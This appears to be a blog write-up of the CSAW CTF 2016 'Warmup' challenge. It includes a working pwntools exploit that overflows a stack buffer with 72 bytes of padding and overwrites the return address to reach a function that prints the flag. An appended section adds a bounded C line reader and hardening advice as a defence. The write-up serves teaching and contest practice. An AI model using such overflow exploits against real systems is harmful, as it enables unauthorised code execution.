The force is with those who read the source.

CSAW CTF 2016: Warmup (pwn 50)

2016-09-20

Description

So you want to be a pwn-er huh? Well let’s throw you an easy one ;)
nc pwn.chal.csaw.io 8000
warmup

Exploit

As the description says, this is a very straightforward challenge. Even without reversing the binary, it prints the address of the target function, which calls system("cat flag.txt"), for us. Just overflow the buffer to overwrite the return address and jump to that function to get the flag.

-Warm Up-
WOW:0x40060d
>
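warmup_exp.py

from pwn import *

# Connect to the challenge service
r = remote('pwn.chal.csaw.io', 8000)
# 72 bytes of padding reach the saved return address, which is then
# overwritten with the address the binary printed (WOW:0x40060d)
r.sendline(b'A'*72 + p64(0x40060d))
print(r.recvall().decode(errors='replace'))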

Flag: FLAG{LET_US_BEGIN_CSAW_2016}
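The overflow above only works because a line is read into a fixed-size stack buffer with no length check. As an added example (not code from the challenge binary or from this write-up), here is a bounded line reader in C that rejects such input instead of writing past the buffer. The 64-byte buffer size and the names read_line_bounded and check_input are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#define BUF_SIZE 64 /* assumed size: 72 = 64-byte buffer + 8-byte saved RBP */

/* Typical vulnerable pattern (comment only): char buf[BUF_SIZE]; gets(buf); */

/* Read one line into dst (capacity cap). Returns its length, or -1 when the
 * line does not fit; an oversized line is drained and rejected, not used. */
int read_line_bounded(FILE *in, char *dst, size_t cap)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';
        return (int)(len - 1);
    }
    /* No newline stored: count what is left of this line. */
    int c, extra = 0;
    while ((c = fgetc(in)) != '\n' && c != EOF)
        extra++;
    if (extra == 0)
        return (int)len;      /* line ended exactly at the buffer limit or EOF */
    dst[0] = '\0';
    return -1;
}

/* Demo helper: feed a constructed input string through the reader. */
int check_input(const char *input, char *out, size_t cap)
{
    FILE *f = tmpfile();
    if (f == NULL) return -2;
    fputs(input, f);
    rewind(f);
    int n = read_line_bounded(f, out, cap);
    fclose(f);
    return n;
}

int main(void)
{
    char buf[BUF_SIZE], big[82];
    memset(big, 'A', 80);     /* constructed input: 72 bytes of padding + 8 more */
    big[80] = '\n'; big[81] = '\0';
    printf("short line: %d\n", check_input("hello\n", buf, sizeof buf));
    printf("80-byte line: %d\n", check_input(big, buf, sizeof buf));
    return 0;
}
```

Building with -fstack-protector-strong and as a position-independent executable adds defence in depth, but the bounds check is the actual fix.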

